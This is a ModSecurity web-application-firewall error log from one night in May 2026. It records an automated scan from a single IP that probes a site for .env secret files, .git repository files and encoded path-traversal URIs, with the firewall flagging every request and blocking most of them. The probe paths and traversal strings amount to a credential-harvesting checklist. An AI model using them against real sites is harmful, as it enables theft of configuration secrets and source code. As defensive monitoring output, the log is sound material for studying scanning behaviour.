[Tue May 12 02:49:55.484823 2026] [security2:error] [pid 1709071:tid 1709105] [client 45.148.10.238:19490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJ5M7vMumyrWMfSu7qqugAAANI"]
[Tue May 12 02:49:55.494278 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.238:19526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.backup"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RggAAAU8"]
[Tue May 12 02:49:55.494466 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.238:19526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.backup"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RggAAAU8"]
[Tue May 12 02:49:56.902292 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.238:19526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RggAAAU8"]
[Tue May 12 02:49:56.920345 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.238:19526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.ENV"] [unique_id "agJ5NDue9Sp-pIv_Bb6RgwAAAU8"]
[Tue May 12 02:49:56.920528 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.238:19526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.ENV"] [unique_id "agJ5NDue9Sp-pIv_Bb6RgwAAAU8"]
[Tue May 12 02:49:57.138555 2026] [security2:error] [pid 1709071:tid 1709105] [client 45.148.10.238:19490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5M7vMumyrWMfSu7qqugAAANI"]
[Tue May 12 02:49:57.156253 2026] [security2:error] [pid 1709071:tid 1709105] [client 45.148.10.238:19490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.old"] [unique_id "agJ5NbvMumyrWMfSu7qquwAAANI"]
[Tue May 12 02:49:57.156465 2026] [security2:error] [pid 1709071:tid 1709105] [client 45.148.10.238:19490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.old"] [unique_id "agJ5NbvMumyrWMfSu7qquwAAANI"]
[Tue May 12 02:49:57.167240 2026] [security2:error] [pid 1695975:tid 1695999] [client 45.148.10.238:19550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5M9VI9ymHBxup74-NWQAAAJU"]
[Tue May 12 02:49:57.180440 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.238:19492] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/refs/heads/main"] [unique_id "agJ5NTue9Sp-pIv_Bb6RhAAAAUE"]
[Tue May 12 02:49:57.180634 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.238:19492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/refs/heads/main"] [unique_id "agJ5NTue9Sp-pIv_Bb6RhAAAAUE"]
[Tue May 12 02:49:57.189618 2026] [security2:error] [pid 1730175:tid 1730201] [client 45.148.10.238:19540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5M3o6NvB9WXx5V-57LgAAARg"]
[Tue May 12 02:49:57.192626 2026] [security2:error] [pid 1691274:tid 1691290] [client 45.148.10.238:19530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5M1fdQaraX_prmqcgCwAAAA0"]
[Tue May 12 02:49:57.194238 2026] [security2:error] [pid 1695975:tid 1695999] [client 45.148.10.238:19550] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/backend/.env"] [unique_id "agJ5NdVI9ymHBxup74-NXAAAAJU"]
[Tue May 12 02:49:57.194452 2026] [security2:error] [pid 1695975:tid 1695999] [client 45.148.10.238:19550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/backend/.env"] [unique_id "agJ5NdVI9ymHBxup74-NXAAAAJU"]
[Tue May 12 02:49:57.196636 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.238:19556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RgAAAAVY"]
[Tue May 12 02:49:57.209215 2026] [security2:error] [pid 1730175:tid 1730201] [client 45.148.10.238:19540] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/refs/heads/master"] [unique_id "agJ5NXo6NvB9WXx5V-57MAAAARg"]
[Tue May 12 02:49:57.209410 2026] [security2:error] [pid 1730175:tid 1730201] [client 45.148.10.238:19540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/refs/heads/master"] [unique_id "agJ5NXo6NvB9WXx5V-57MAAAARg"]
[Tue May 12 02:49:57.215198 2026] [security2:error] [pid 1691274:tid 1691290] [client 45.148.10.238:19530] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/config"] [unique_id "agJ5NVfdQaraX_prmqcgDQAAAA0"]
[Tue May 12 02:49:57.215442 2026] [security2:error] [pid 1691274:tid 1691290] [client 45.148.10.238:19530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/config"] [unique_id "agJ5NVfdQaraX_prmqcgDQAAAA0"]
[Tue May 12 02:49:57.218368 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.238:19556] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/storage/.env"] [unique_id "agJ5NTue9Sp-pIv_Bb6RhQAAAVY"]
[Tue May 12 02:49:57.218526 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.238:19556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/storage/.env"] [unique_id "agJ5NTue9Sp-pIv_Bb6RhQAAAVY"]
[Tue May 12 02:49:57.284614 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.238:19568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5M1fdQaraX_prmqcgCgAAAAY"]
[Tue May 12 02:49:57.302069 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.238:19568] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/logs/HEAD"] [unique_id "agJ5NVfdQaraX_prmqcgDgAAAAY"]
[Tue May 12 02:49:57.302266 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.238:19568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/logs/HEAD"] [unique_id "agJ5NVfdQaraX_prmqcgDgAAAAY"]
[Tue May 12 02:49:57.328642 2026] [security2:error] [pid 1695975:tid 1695989] [client 45.148.10.238:19600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/app/.env"] [unique_id "agJ5NdVI9ymHBxup74-NXQAAAIs"]
[Tue May 12 02:49:57.328826 2026] [security2:error] [pid 1695975:tid 1695989] [client 45.148.10.238:19600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/app/.env"] [unique_id "agJ5NdVI9ymHBxup74-NXQAAAIs"]
[Tue May 12 02:49:57.389829 2026] [security2:error] [pid 1709071:tid 1709091] [client 45.148.10.238:19478] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/api/.env"] [unique_id "agJ5NbvMumyrWMfSu7qqvQAAAMQ"]
[Tue May 12 02:49:57.390036 2026] [security2:error] [pid 1709071:tid 1709091] [client 45.148.10.238:19478] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/api/.env"] [unique_id "agJ5NbvMumyrWMfSu7qqvQAAAMQ"]
[Tue May 12 02:49:57.400406 2026] [security2:error] [pid 1691274:tid 1691294] [client 45.148.10.238:19462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJ5M1fdQaraX_prmqcgDAAAABI"]
[Tue May 12 02:49:57.419270 2026] [security2:error] [pid 1691274:tid 1691294] [client 45.148.10.238:19462] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/local/.env"] [unique_id "agJ5NVfdQaraX_prmqcgDwAAABI"]
[Tue May 12 02:49:57.419479 2026] [security2:error] [pid 1691274:tid 1691294] [client 45.148.10.238:19462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/local/.env"] [unique_id "agJ5NVfdQaraX_prmqcgDwAAABI"]
[Tue May 12 02:49:57.538475 2026] [security2:error] [pid 1695975:tid 1695988] [client 45.148.10.238:19524] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJ5NdVI9ymHBxup74-NXgAAAIo"]
[Tue May 12 02:49:57.538676 2026] [security2:error] [pid 1695975:tid 1695988] [client 45.148.10.238:19524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJ5NdVI9ymHBxup74-NXgAAAIo"]
[Tue May 12 02:49:57.596248 2026] [security2:error] [pid 1707624:tid 1707692] [client 45.148.10.238:19584] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ5NbOxS7i6i_mT2NLJHAAAAEo"]
[Tue May 12 02:49:57.596384 2026] [security2:error] [pid 1707624:tid 1707692] [client 45.148.10.238:19584] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ5NbOxS7i6i_mT2NLJHAAAAEo"]
[Tue May 12 02:49:57.596426 2026] [security2:error] [pid 1707624:tid 1707692] [client 45.148.10.238:19584] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ5NbOxS7i6i_mT2NLJHAAAAEo"]
